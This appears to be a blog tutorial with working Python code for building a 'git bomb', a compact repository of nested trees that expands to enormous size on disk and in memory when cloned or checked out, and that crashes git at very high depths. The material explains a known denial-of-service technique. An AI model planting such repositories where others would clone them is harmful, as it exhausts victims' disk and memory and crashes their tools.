Note: This is all Python 3 code. Other versions of Python may handle subprocesses and bytearrays differently.
A Git bomb is a compact repository that explodes to consume extreme size on disk and in memory. Read more about them in the original git bomb post. This post walks through some code to create them. A full script to create them is available in the Git Bomb Readme.
The basic outline:
depth = 10 # how many layers deep
width = 10 # how many files or folders per depth level
blob_body = b'one laugh' # content of blob at bottom
# Create base blob
blob_hash = write_git_object(blob_body, type='blob')
# Dirs is an array of (name, hash) pairs
dirs = [('f' + str(i), blob_hash) for i in range(width)]
file_permission = '100644'
# Write tree object containing the blob `width` times
tree_hash = write_git_object(create_tree(dirs, file_permission), type='tree')
# Make layers of tree objects using the previous tree object
# Each tree contains the last tree `width` times
for i in range(depth - 1):
# again dirs is an array of (name, hash) pairs
dirs = [('d' + str(i), tree_hash) for i in range(width)]
tree_permission = '40000' # trees and blobs need different permissions
tree_hash = write_git_object(create_tree(dirs, tree_permission), type='tree')
# Create a commit pointing at our topmost tree
commit_hash = write_git_commit(tree_hash)
# Update master ref to point to new commit
open('.git/refs/heads/master', 'wb').write(commit_hash)
The bodies of write_git_object
and write_git_commit
simply call the appropriate git commands (git hash-object
and git commit-tree
). There is nothing magic about those commands, you can achieve the same thing using hashlib
and zlib
if you want to learn more about git internals.
def write_git_object(object_body, type='tree'):
'''Writes a git object and returns the hash'''
with tempfile.NamedTemporaryFile() as f:
f.write(object_body)
f.flush()
command = ['git', 'hash-object', '-w', '-t', type, f.name]
return subprocess.check_output(command).strip()
def write_git_commit(tree_hash, commit_message='Create a git bomb'):
'''Writes a git commit and returns the hash'''
command = ['git', 'commit-tree', '-m', commit_message, tree_hash]
return subprocess.check_output(command).strip()
create_tree
makes a valid tree object. Git tree objects are quite simple, they are a concatenated list of {permission} {sub-tree or blob name}\x00{sub-tree or blob hash as binary}
.
def create_tree(dirs, perm):
body = b''
for a_dir in sorted(dirs, key=lambda x: x[0]):
body += bytearray(perm, 'ascii') + b'\x20' + bytearray(a_dir[0], 'ascii')
body += b'\x00' + binascii.unhexlify(a_dir[1])
return body
That’s it! Different paramaters for depth
and width
will have different properties. I chose 10
for both in my original post to be similar to the “billion laughs” XML bomb. Choosing very high values for depth
(around ~10,000 on my machine) will cause git to segfault after running out of stack space.